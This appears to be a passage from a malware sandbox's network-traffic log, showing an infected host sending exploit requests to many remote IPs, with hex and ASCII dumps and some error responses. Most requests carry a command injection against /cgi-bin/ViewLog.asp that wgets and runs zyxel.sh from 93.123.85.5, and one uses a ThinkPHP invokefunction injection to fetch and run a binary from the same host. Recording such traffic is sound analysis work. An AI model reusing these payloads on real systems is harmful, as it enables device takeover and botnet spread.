                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 73 20 2d 2d 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 75 6e 69 74 6f 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a 31 30 30 25 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 7d 61 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 6d 6f 6e 6f 73 70 61 63 65 2c 6d 6f 6e 6f 73 70 61 63 65 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 79 73 74 65 6d 2d 75 69 2c 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 52 6f 62 6f 74 6f 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 41 72 69 61 6c 2c 4e 6f 74 6f 20 53 61 6e 73 2c 73 61 6e 73 2d 73 65 72 69 66 2c 41 70 70 6c 65 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 45 6d 6f 6a 69 2c 53 65 67 6f 65 20 55 49 20 53 79 6d 62 6f 6c 2c 4e 6f 74 6f 20 43 6f 6c 6f 72 20 45 6d 6f 6a 69 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 35 7d 2a 2c 3a 61 66 74 65 72 2c 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 62 6f 72 64 65 72 3a 30 20 73 6f 6c 69 64 20 23 65 32 65 38 66 30 7d 61 7b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 69 6e 68 65 72 69 74 7d 63 6f 64 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 4d 6f 6e 61 63 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 2c 43 6f 75 72 69 65 72 20 4e 65 77 2c 6d 6f 6e 6f 73 70 61 63 65 7d 73 76 67 2c 76 69 64 65 6f 7b 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c
                                                              Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> ... Fonts --> <link rel="preconnect" href="https://fonts.gstatic.com"> <link href="https://fonts.googleapis.com/css2?family=Nunito&display=swap" rel="stylesheet"> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-al


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              393192.168.2.234885431.136.177.778080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.140539885 CET8447OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:09.164473057 CET8606OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:11.180191994 CET8846OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:15.275686979 CET9330OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:23.466756105 CET10305OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:39.592484951 CET12253OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:20:13.380060911 CET16549OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              394192.168.2.233949262.156.39.328080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.144464016 CET8448OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.476658106 CET8479INHTTP/1.1 404
                                                              Content-Type: text/html;charset=utf-8
                                                              Content-Language: de
                                                              Content-Length: 743
                                                              Date: Mon, 13 Nov 2023 21:19:06 GMT
                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 64 65 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 62 6f 64 79 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 68 31 2c 20 68 32 2c 20 68 33 2c 20 62 20 7b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 68 32 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 68 33 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 70 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 20 61 20 7b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 7d 20 2e 6c 69 6e 65 20 7b 68 65 69 67 68 74 3a 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 62 6f 72 64 65 72 3a 6e 6f 6e 65 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 e2 80 93 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 70 3e 3c 62 3e 54 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 52 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 4d 65 73 73 61 67 65 3c 2f 62 3e 20 26 23 34 37 3b 63 67 69 2d 62 69 6e 26 23 34 37 3b 56 69 65 77 4c 6f 67 2e 61 73 70 3c 2f 70 3e 3c 70 3e 3c 62 3e 42 65 73 63 68 72 65 69 62 75 6e 67 3c 2f 62 3e 20 54 68 65 20 6f 72 69 67 69 6e 20 73 65 72 76 65 72 20 64 69 64 20 6e 6f 74 20 66 69 6e 64 20 61 20 63 75 72 72 65 6e 74 20 72 65 70 72 65 73 65 6e 74 61 74 69 6f 6e 20 66 6f 72 20 74 68 65 20 74 61 72 67 65 74 20 72 65 73 6f 75 72 63 65 20 6f 72 20 69 73 20 6e 6f 74 20 77 69 6c 6c 69 6e 67 20 74 6f 20 64 69 73 63 6c 6f 73 65 20 74 68 61 74 20 6f 6e 65 20 65 78 69 73 74 73 2e 3c 2f 70 3e 3c 68 72 20 63 6c 61 73 73 3d 22 6c 69 6e 65 22 20 2f 3e 3c 68 33 3e 41 70 61 63 68 65 20 54 6f 6d 63 61 74 2f 38 2e 35 2e 35 30 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                              Data Ascii: <!doctype html><html lang="de"><head><title>HTTP Status 404 nicht gefunden</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404 nicht gefunden</h1><hr class="line" /><p><b>Type</b> Status Report</p><p><b>Message</b> &#47;cgi-bin&#47;ViewLog.asp</p><p><b>Beschreibung</b> The origin server did not find a current representation for the target resource or is not willing to disclose that one exists.</p><hr class="line" /><h3>Apache Tomcat/8.5.50</h3></body></html>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              395192.168.2.235628694.253.15.2068080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.146043062 CET8449OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              396192.168.2.234669885.156.144.578080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.148569107 CET8449OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              397192.168.2.233702885.254.16.2008080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.149648905 CET8450OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.506285906 CET8483INHTTP/1.1 404 Not Found
                                                              Connection: close
                                                              Content-Type: text/plain
                                                              Transfer-Encoding: chunked


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              398192.168.2.233617262.29.53.1608080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.154882908 CET8451OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              399192.168.2.235797294.123.249.1088080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.155466080 CET8452OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              4192.168.2.234227662.29.114.48080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:00.696152925 CET390OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              40192.168.2.235713888.198.195.12180
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:18:14.361745119 CET1882OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: /
                                                              User-Agent: Uirusu/2.0
                                                              Nov 13, 2023 22:18:14.665302038 CET1886INHTTP/1.1 400 Bad Request
                                                              Content-Type: text/html; charset=us-ascii
                                                              Server: Microsoft-HTTPAPI/2.0
                                                              Date: Mon, 13 Nov 2023 21:18:25 GMT
                                                              Connection: close
                                                              Content-Length: 311
                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              400192.168.2.233951494.121.149.1458080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.155651093 CET8452OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              401192.168.2.233925495.174.125.728080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.161370039 CET8453OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              402192.168.2.234929894.72.106.68080
                                                              TimestampkBytes transferredDirectionData
                                                              Nov 13, 2023 22:19:08.164439917 CET8454OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                              Host: 192.168.0.14:80
                                                              Connection: keep-alive
                                                              Accept-Encoding: gzip, deflate
                                                              Accept: */*
                                                              User-Agent: python-requests/2.20.0
                                                              Content-Length: 227
                                                              Content-Type: application/x-www-form-urlencoded
                                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 39 33 2e 31 32 33 2e 38 35 2e 35 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                              Data Ascii: /bin/busybox wget http://93.123.85.5/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                              Nov 13, 2023 22:19:08.547760963 CET8486INHTTP/1.1 500 Internal Server Error
                                                              Content-Type: text/html; charset=utf-8
                                                              Content-Length: 130
                                                              Set-Cookie: JSESSIONID=deleted; Expires=Thu, 01 Jan 1970 00:00:01 GMT; Path=/; HttpOnly
                                                              Connection: close
